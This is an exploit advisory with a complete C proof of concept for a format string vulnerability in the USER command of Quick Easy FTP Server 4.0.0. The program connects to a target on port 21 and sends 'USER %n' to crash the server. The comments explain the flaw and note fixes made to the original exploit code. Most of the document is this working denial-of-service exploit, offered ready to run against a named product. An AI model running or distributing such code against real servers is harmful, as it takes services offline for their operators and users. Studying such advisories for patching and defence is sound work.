# Exploit Title: Quick easy ftp server 4.0.0 USER command format string Vulnerability
# Date: [date]
# Vendor or Software Link: not provided (search for the product by name)
# Version: 4.0.0 (other versions may also be affected, untested)
# Category:: [remote]
# Tested on: win2k sp4 (cn)
Description:
Quick Easy FTP Server does not sanitize the format string it passes to wsprintfA, so the argument of the USER command is interpreted as a format. Because the destination buffer is too small, turning this into code execution looks difficult; this PoC instead sends the "%n" specifier to crash the server, i.e. a denial of service.
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize);
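/*
 * Entry point of the PoC.
 *
 * Usage: exp [ip address]
 *
 * Builds the "USER %n" payload and hands it to SendPayload() for port 21.
 * Returns 0 after sending (or after printing usage), non-zero when the
 * host argument is rejected or SendPayload() reports a failure.
 */
int main(int argc, char* argv[])
{
	if(argc != 2)
	{
		printf("Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC\r\n");
		printf("contact: ylbhz@hotmail.com\r\n");
		printf("C:\\>exp [ip address]\r\n");
		return 0;
	}

	/*
	 * argv[1] is caller-controlled. The original code strcpy()'d it into
	 * this 20-byte stack buffer unchecked, which is a stack overflow in the
	 * exploit itself. A dotted-quad IPv4 address is at most 15 characters,
	 * so anything that does not fit is rejected instead of copied.
	 */
	char strHost[20] = {0};
	size_t hostLen = strlen(argv[1]);
	if (hostLen >= sizeof strHost)
	{
		printf("[-]Host argument too long (max %u characters)\r\n",
		       (unsigned)(sizeof strHost - 1));
		return 1;
	}
	memcpy(strHost, argv[1], hostLen);   /* strHost stays NUL-terminated */

	/* "%n" is the format specifier that makes the server write through the
	   stack; the trailing CRLFs terminate the FTP command. */
	char lpBuf[] = "USER %n\r\n\r\n";
	if (SendPayload(strHost, 21, lpBuf, lstrlenA(lpBuf)) != 0)
		return 1;
	return 0;
}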
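/*
 * Open a TCP connection to lpHost:intPort, send intSize bytes of lpPayload
 * and read at most one reply.
 *
 * lpHost    - dotted-quad IPv4 address (inet_addr() syntax); no DNS lookup.
 * intPort   - destination TCP port.
 * lpPayload - bytes to send; not required to be NUL-terminated.
 * intSize   - number of bytes of lpPayload to send.
 *
 * Returns 0 when the payload was sent, -1 on any failure (Winsock init,
 * bad address, socket, connect or send). Winsock is always cleaned up
 * before returning, on both the success and the failure paths -- the
 * original leaked the socket/WSA state on success.
 */
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize)
{
	WSADATA wsa;
	struct sockaddr_in client;
	SOCKET sock = INVALID_SOCKET;
	int rc = -1;
	int intLen;
	char strBuf[1024];

	printf("[*]Init socket...\r\n");
	if (WSAStartup(MAKEWORD(2,2), &wsa) != 0)
	{
		printf("[-]WSAStartup Error!\r\n");
		return -1;
	}

	/*
	 * inet_addr() signals a malformed address with INADDR_NONE (it also
	 * returns INADDR_NONE for "255.255.255.255", which is not a usable
	 * unicast target here anyway). The try/catch that used to wrap these
	 * assignments could never fire: none of them throws.
	 */
	memset(&client, 0, sizeof client);
	client.sin_family = AF_INET;
	client.sin_port = htons((u_short)intPort);
	client.sin_addr.S_un.S_addr = inet_addr(lpHost);
	if (client.sin_addr.S_un.S_addr == INADDR_NONE)
	{
		printf("[-]socket_inaddr init error!\r\n");
		goto cleanup;
	}

	/* socket() reports failure with INVALID_SOCKET, not SOCKET_ERROR. */
	sock = socket(AF_INET, SOCK_STREAM, 0);
	if (sock == INVALID_SOCKET)
	{
		printf("[-]socket create error!\r\n");
		goto cleanup;
	}
	printf("[+]Socket Init success!\r\n");

	printf("[*]Connect the Server...\r\n");
	if (connect(sock, (struct sockaddr *)&client, sizeof client) == SOCKET_ERROR)
	{
		printf("[-]Connect Error!\r\n");
		goto cleanup;
	}
	printf("[+]Connect successfull!\r\n");

	printf("[*]Send Payload!\r\n");
	intLen = send(sock, lpPayload, intSize, 0);
	if (intLen <= 0)
	{
		/* Previously the code went on to recv() after a failed send. */
		printf("[-]Send Payload Error!\r\n");
		goto cleanup;
	}
	printf("Send %d bytes\r\n", intLen);

	/*
	 * Read one reply. Leave a byte for the terminator and print the data
	 * through a length-bounded "%.*s" as an argument, never as the format:
	 * the server's response is untrusted input.
	 */
	memset(strBuf, 0, sizeof strBuf);
	intLen = recv(sock, strBuf, (int)sizeof strBuf - 1, 0);
	if (intLen > 0)
	{
		strBuf[intLen] = '\0';
		printf("[*]Server replied %d bytes: %.*s\r\n", intLen, intLen, strBuf);
	}
	else
	{
		/* 0 = peer closed, SOCKET_ERROR = reset/error: either is consistent
		   with the target having crashed, which is what this PoC is for. */
		printf("[*]No reply (connection closed or error)\r\n");
	}
	rc = 0;

cleanup:
	printf("[*]Close Socket!\r\n");
	if (sock != INVALID_SOCKET)
		closesocket(sock);
	WSACleanup();
	return rc;
}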